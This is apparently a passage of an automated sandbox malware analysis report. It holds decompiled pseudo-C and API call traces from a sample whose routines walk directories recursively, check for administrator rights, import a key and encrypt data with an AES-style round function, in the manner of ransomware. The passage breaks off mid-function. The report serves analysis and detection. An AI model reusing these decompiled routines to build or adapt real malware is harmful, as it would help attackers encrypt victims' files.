CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F1D3724,00000000,00000000,00000000), ref: 0F1D655E
GetLastError.KERNEL32(?,0F1D3724,00000000,00000000,00000000), ref: 0F1D6568
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1D3724,00000000,00000000,00000000), ref: 0F1D6584
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F1D3724,00000000,00000000), ref: 0F1D65B9
CryptGetKeyParam.ADVAPI32(00000000,00000008,0F1D3724,0000000A,00000000,?,0F1D3724,00000000), ref: 0F1D65DA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F1D3724,?,0F1D3724,00000000), ref: 0F1D6602
GetLastError.KERNEL32(?,0F1D3724,00000000), ref: 0F1D660B
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F1D3724,00000000,00000000), ref: 0F1D6628
LeaveCriticalSection.KERNEL32(0F1E2A48,?,0F1D3724,00000000,00000000), ref: 0F1D6633

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F1D6553, 0F1D6579

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: e1aad33183071bbd49869a46fb0a96bffda1e34ad1798ff308fd01360a18bdbd
Instruction ID: 944ed14df46d375317d42a891e0b58a76b9dce35aa8abf1d8624beb90e503b1d
Opcode Fuzzy Hash: e1aad33183071bbd49869a46fb0a96bffda1e34ad1798ff308fd01360a18bdbd
Instruction Fuzzy Hash: B5312F75A51309BBDB10DFA0DD45FEE77B8AF48701F108548F601AA181DB79A660CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6C90 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1D6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F1D6A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F1D6BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F1D6950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F1D6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0f1d6c9c
0x0f1d6c9f
0x0f1d6ca1
0x0f1d6ca8
0x0f1d6dd6
0x0f1d6dd6
0x0f1d6ddc
0x0f1d6cbd
0x0f1d6cbd
0x0f1d6cd5
0x0f1d6cd8
0x0f1d6cdb
0x0f1d6ce5
0x0f1d6ceb
0x0f1d6ced
0x0f1d6cf0
0x0f1d6cf6
0x0f1d6d04
0x0f1d6d10
0x0f1d6d1c
0x0f1d6d22
0x0f1d6d24
0x0f1d6d36
0x0f1d6d3c
0x0f1d6d3e
0x0f1d6d48
0x0f1d6d4a
0x0f1d6d51
0x0f1d6d82
0x0f1d6d85
0x0f1d6d8a
0x0f1d6d8d
0x0f1d6d8f
0x0f1d6d92
0x0f1d6d95
0x0f1d6d97
0x0f1d6da0
0x0f1d6da0
0x0f1d6da3
0x0f1d6da3
0x0f1d6d99
0x0f1d6d9c
0x0f1d6d9e
0x00000000
0x00000000
0x0f1d6d9e
0x0f1d6d97
0x0f1d6d53
0x0f1d6d67
0x0f1d6d6c
0x0f1d6d6c
0x0f1d6dae
0x0f1d6dae
0x0f1d6db0
0x0f1d6db0
0x0f1d6d3e
0x0f1d6dbd
0x0f1d6dc3
0x0f1d6dc3
0x0f1d6dce
0x00000000
0x0f1d6cf8
0x0f1d6d03
0x0f1d6d03
0x0f1d6cf6

APIs

Part of subcall function 0F1D6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6653
Part of subcall function 0F1D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D66F2
Part of subcall function 0F1D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D670C
Part of subcall function 0F1D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6726
Part of subcall function 0F1D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6740
Part of subcall function 0F1D6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6760

Part of subcall function 0F1D6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F1D6A52
Part of subcall function 0F1D6A40: lstrcatW.KERNEL32(00000000,0F1DFEC4), ref: 0F1D6A64
Part of subcall function 0F1D6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F1D6A72
Part of subcall function 0F1D6A40: lstrcmpW.KERNEL32(?,0F1DFEC8,?,?), ref: 0F1D6A9C
Part of subcall function 0F1D6A40: lstrcmpW.KERNEL32(?,0F1DFECC,?,?), ref: 0F1D6AB2
Part of subcall function 0F1D6A40: lstrcatW.KERNEL32(00000000,?), ref: 0F1D6AC4
Part of subcall function 0F1D6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0F1D6ACB
Part of subcall function 0F1D6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F1D6AFA
Part of subcall function 0F1D6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F1D6B11
Part of subcall function 0F1D6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F1D6B1C
Part of subcall function 0F1D6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F1D6B3A
Part of subcall function 0F1D6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F1D6B4F

Part of subcall function 0F1D6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F1D6CC2,00000000,?,?), ref: 0F1D6BF5
Part of subcall function 0F1D6BE0: wsprintfW.USER32 ref: 0F1D6C03
Part of subcall function 0F1D6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F1D6C1F
Part of subcall function 0F1D6BE0: GetLastError.KERNEL32(?,?), ref: 0F1D6C2C
Part of subcall function 0F1D6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F1D6C78

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F1D6CC3
lstrcatW.KERNEL32(00000000,0F1DFEC4), ref: 0F1D6CDB
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F1D6CE5
lstrcmpW.KERNEL32(?,0F1DFEC8,?,?), ref: 0F1D6D1C
lstrcmpW.KERNEL32(?,0F1DFECC,?,?), ref: 0F1D6D36
lstrcatW.KERNEL32(00000000,?), ref: 0F1D6D48
lstrcatW.KERNEL32(00000000,0F1DFEFC), ref: 0F1D6D59
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F1D6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0F1D6DCE

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: e999f9b242ebecfc1fdf395ccb8ba22b1c84d611baf9c9747d8d897d48cc5aec
Instruction ID: 51851ee2b418da6c406d75018db9cc911718d3343d362d458156f96d73e5af46
Opcode Fuzzy Hash: e999f9b242ebecfc1fdf395ccb8ba22b1c84d611baf9c9747d8d897d48cc5aec
Instruction Fuzzy Hash: 6631C371A01219EBCF10EF68EC84AAE77B8FF44311F0441A6F845E7112EB35AA61DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D3AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0F1D3AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}

0x0f1d3aa9
0x0f1d3ac9
0x0f1d3ad0
0x0f1d3ad8
0x0f1d3aef
0x0f1d3afe
0x0f1d3b05
0x0f1d3b07
0x0f1d3b0a
0x0f1d3b16
0x0f1d3add
0x0f1d3add
0x0f1d3add

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F1D3AD0
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F1D3AE3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F1D3AEF
FreeSid.ADVAPI32(?), ref: 0F1D3B0A

Strings

CheckTokenMembership, xrefs: 0F1D3AE9
advapi32.dll, xrefs: 0F1D3ADE

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 8682721304b0a3a098b7a20baf68b04bb1c206b39fb19501b95d87547d3f3867
Instruction ID: fb0dba5b9cebe6dced85e26a9123e20ce2e6627b09ca9d84848752db9e219530
Opcode Fuzzy Hash: 8682721304b0a3a098b7a20baf68b04bb1c206b39fb19501b95d87547d3f3867
Instruction Fuzzy Hash: 18F04F34A8130DBBDF00DBE4DC0AFAD7778EF04712F004584F905E6182E7B966648B55

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D1C20 Relevance: .7, Instructions: 721
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F1D1C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t514;
				signed char _t522;
				signed char _t530;
				signed char _t538;
				signed char _t546;
				signed char _t554;
				signed char _t562;
				signed char _t570;
				signed char _t578;
				signed char _t586;
				void* _t595;
				signed char _t603;
				signed char _t618;
				signed int _t628;
				signed char _t630;
				signed char _t631;
				signed char _t633;
				signed char _t635;
				signed char _t636;
				signed char _t638;
				signed char _t640;
				signed char _t641;
				signed char _t643;
				signed char _t645;
				signed char _t646;
				signed char _t648;
				signed char _t650;
				signed char _t651;
				signed char _t653;
				signed char _t655;
				signed char _t656;
				signed char _t658;
				signed char _t660;
				signed char _t661;
				signed char _t663;
				signed char _t665;
				signed char _t666;
				signed char _t668;
				signed char _t670;
				signed char _t671;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed char _t681;
				signed char _t682;
				signed char _t684;
				signed char _t686;
				signed char _t687;
				signed char _t690;
				signed char _t691;
				signed char _t693;
				signed char _t695;
				signed char _t696;
				signed int _t699;
				signed char _t700;
				signed char _t708;
				signed char _t709;
				signed char _t717;
				signed char _t718;
				signed char _t726;
				signed char _t727;
				signed char _t735;
				signed char _t736;
				signed char _t744;
				signed char _t745;
				signed char _t753;
				signed char _t754;
				signed char _t762;
				signed char _t763;
				signed char _t771;
				signed char _t772;
				signed char _t780;
				signed char _t781;
				signed char _t789;
				signed char _t797;
				signed char _t798;
				signed char _t806;
				signed char _t814;
				signed char _t815;
				signed int _t824;
				signed char _t825;
				signed char _t826;
				signed char _t827;
				signed char _t828;
				signed char _t829;
				signed char _t830;
				signed char _t831;
				signed char _t832;
				signed char _t833;
				signed char _t834;
				signed char _t835;
				signed char _t836;
				signed char _t837;
				signed char _t838;
				signed char _t839;
				signed char _t840;
				signed char _t841;
				signed char _t842;
				signed char _t843;
				signed char _t844;
				signed char _t845;
				signed char _t846;
				signed char _t847;
				signed char _t848;
				signed char _t849;
				signed int _t851;
				signed int* _t924;
				signed int* _t997;
				signed int* _t998;
				signed int* _t999;
				signed int* _t1011;
				signed int* _t1012;
				signed int* _t1024;
				signed int* _t1025;
				signed int* _t1037;
				signed int* _t1038;
				signed int* _t1050;
				signed int* _t1051;
				signed int* _t1063;
				signed int* _t1064;
				signed int* _t1076;
				signed int* _t1077;
				signed int* _t1089;
				signed int* _t1090;
				signed int* _t1102;
				signed int* _t1103;
				signed int* _t1115;
				signed int* _t1116;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1131;
				signed int* _t1143;
				signed int* _t1144;
				signed int* _t1156;
				signed int* _t1168;
				signed int* _t1169;
				signed int** _t1181;

				_t1181[4] = _t997;
				_t1181[3] = __ebx;
				_t1181[2] = __esi;
				_t1181[1] = __edi;
				_t924 = _t1181[6];
				_t998 = _t1181[8];
				_t851 = _t998[0x3c] & 0x000000ff;
				_t514 =  *_t924 ^  *_t998;
				_t628 = _t924[1] ^ _t998[1];
				_t699 = _t924[2] ^ _t998[2];
				_t824 = _t924[3] ^ _t998[3];
				if(_t851 == 0xa0) {
					L6:
					_t999 =  &(_t998[4]);
					 *_t1181 = _t999;
					asm("rol eax, 0x10");
					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
					_t700 = _t699 >> 0x10;
					_t631 = _t630 >> 0x10;
					_t825 = _t824 >> 0x10;
					_t708 = _t999[2] ^  *(0xf1dc240 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t825 & 0x000000ff) * 4);
					_t826 = _t999[3] ^  *(0xf1dc240 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t631 & 0x000000ff) * 4);
					_t1011 =  *_t1181;
					_t522 =  *(0xf1dca40 + (_t700 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t630 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
					_t633 =  *(0xf1dc240 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t630 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t700 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
					_t1012 =  &(_t1011[4]);
					 *_t1181 = _t1012;
					asm("rol eax, 0x10");
					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
					_t709 = _t708 >> 0x10;
					_t636 = _t635 >> 0x10;
					_t827 = _t826 >> 0x10;
					_t717 = _t1012[2] ^  *(0xf1dc240 + (_t708 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t633 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t522 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t827 & 0x000000ff) * 4);
					_t828 = _t1012[3] ^  *(0xf1dc240 + (_t826 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t708 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t522 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t636 & 0x000000ff) * 4);
					_t1024 =  *_t1181;
					_t530 =  *(0xf1dca40 + (_t709 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t635 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t826 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
					_t638 =  *(0xf1dc240 + (_t633 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t635 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t709 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
					_t1025 =  &(_t1024[4]);
					 *_t1181 = _t1025;
					asm("rol eax, 0x10");
					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
					_t718 = _t717 >> 0x10;
					_t641 = _t640 >> 0x10;
					_t829 = _t828 >> 0x10;
					_t726 = _t1025[2] ^  *(0xf1dc240 + (_t717 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t638 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t530 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t829 & 0x000000ff) * 4);
					_t830 = _t1025[3] ^  *(0xf1dc240 + (_t828 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t717 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t530 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t641 & 0x000000ff) * 4);
					_t1037 =  *_t1181;
					_t538 =  *(0xf1dca40 + (_t718 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t640 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t828 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
					_t643 =  *(0xf1dc240 + (_t638 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t640 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t718 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
					_t1038 =  &(_t1037[4]);
					 *_t1181 = _t1038;
					asm("rol eax, 0x10");
					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
					_t727 = _t726 >> 0x10;
					_t646 = _t645 >> 0x10;
					_t831 = _t830 >> 0x10;
					_t735 = _t1038[2] ^  *(0xf1dc240 + (_t726 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t643 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t538 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t831 & 0x000000ff) * 4);
					_t832 = _t1038[3] ^  *(0xf1dc240 + (_t830 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t726 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t538 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t646 & 0x000000ff) * 4);
					_t1050 =  *_t1181;
					_t546 =  *(0xf1dca40 + (_t727 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t645 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t830 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
					_t648 =  *(0xf1dc240 + (_t643 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t645 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t727 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
					_t1051 =  &(_t1050[4]);
					 *_t1181 = _t1051;
					asm("rol eax, 0x10");
					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
					_t736 = _t735 >> 0x10;
					_t651 = _t650 >> 0x10;
					_t833 = _t832 >> 0x10;
					_t744 = _t1051[2] ^  *(0xf1dc240 + (_t735 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t648 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t546 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t833 & 0x000000ff) * 4);
					_t834 = _t1051[3] ^  *(0xf1dc240 + (_t832 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t735 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t546 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t651 & 0x000000ff) * 4);
					_t1063 =  *_t1181;
					_t554 =  *(0xf1dca40 + (_t736 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t650 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t832 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
					_t653 =  *(0xf1dc240 + (_t648 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t650 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t736 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
					_t1064 =  &(_t1063[4]);
					 *_t1181 = _t1064;
					asm("rol eax, 0x10");
					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
					_t745 = _t744 >> 0x10;
					_t656 = _t655 >> 0x10;
					_t835 = _t834 >> 0x10;
					_t753 = _t1064[2] ^  *(0xf1dc240 + (_t744 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t653 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t554 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t835 & 0x000000ff) * 4);
					_t836 = _t1064[3] ^  *(0xf1dc240 + (_t834 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t744 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t554 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t656 & 0x000000ff) * 4);
					_t1076 =  *_t1181;
					_t562 =  *(0xf1dca40 + (_t745 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t655 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t834 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
					_t658 =  *(0xf1dc240 + (_t653 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t655 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t745 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
					_t1077 =  &(_t1076[4]);
					 *_t1181 = _t1077;
					asm("rol eax, 0x10");
					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
					_t754 = _t753 >> 0x10;
					_t661 = _t660 >> 0x10;
					_t837 = _t836 >> 0x10;
					_t762 = _t1077[2] ^  *(0xf1dc240 + (_t753 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t658 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t562 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t837 & 0x000000ff) * 4);
					_t838 = _t1077[3] ^  *(0xf1dc240 + (_t836 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t753 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t562 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t661 & 0x000000ff) * 4);
					_t1089 =  *_t1181;
					_t570 =  *(0xf1dca40 + (_t754 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t660 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t836 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
					_t663 =  *(0xf1dc240 + (_t658 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t660 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t754 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
					_t1090 =  &(_t1089[4]);
					 *_t1181 = _t1090;
					asm("rol eax, 0x10");
					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
					_t763 = _t762 >> 0x10;
					_t666 = _t665 >> 0x10;
					_t839 = _t838 >> 0x10;
					_t771 = _t1090[2] ^  *(0xf1dc240 + (_t762 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t663 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t570 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t839 & 0x000000ff) * 4);
					_t840 = _t1090[3] ^  *(0xf1dc240 + (_t838 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t762 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t570 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t666 & 0x000000ff) * 4);
					_t1102 =  *_t1181;
					_t578 =  *(0xf1dca40 + (_t763 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t665 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t838 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
					_t668 =  *(0xf1dc240 + (_t663 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t665 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t763 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
					_t1103 =  &(_t1102[4]);
					 *_t1181 = _t1103;
					asm("rol eax, 0x10");
					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t671 = _t670 >> 0x10;
					_t841 = _t840 >> 0x10;
					_t780 = _t1103[2] ^  *(0xf1dc240 + (_t771 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t668 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t578 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t841 & 0x000000ff) * 4);
					_t842 = _t1103[3] ^  *(0xf1dc240 + (_t840 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t771 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t578 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t671 & 0x000000ff) * 4);
					_t1115 =  *_t1181;
